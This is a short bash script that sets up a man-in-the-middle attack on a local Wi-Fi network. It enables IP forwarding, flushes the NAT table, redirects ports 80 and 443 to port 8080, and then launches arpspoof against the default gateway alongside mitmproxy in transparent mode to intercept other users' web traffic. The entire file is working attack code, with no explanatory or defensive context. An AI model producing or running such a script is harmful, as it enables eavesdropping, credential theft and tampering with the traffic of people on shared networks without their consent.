#!/bin/bash
WIFI_INTERFACE=$(iw dev | grep "Interface" | sed -r "s/\s+Interface\s+(\W)*/\1/")
NIC=$WIFI_INTERFACE
GATEWAY=$(ip route | grep "default via" |  cut -d " " -f 3)
echo Using interface $NIC
echo [*] Enabling IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
echo [*] Adding redirect iptables rule
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
echo [*] Starting arp spoofing
urxvt -e bash -c "arpspoof -i $NIC $GATEWAY" &
urxvt -e bash -c "mitmproxy -T --host" &
wait
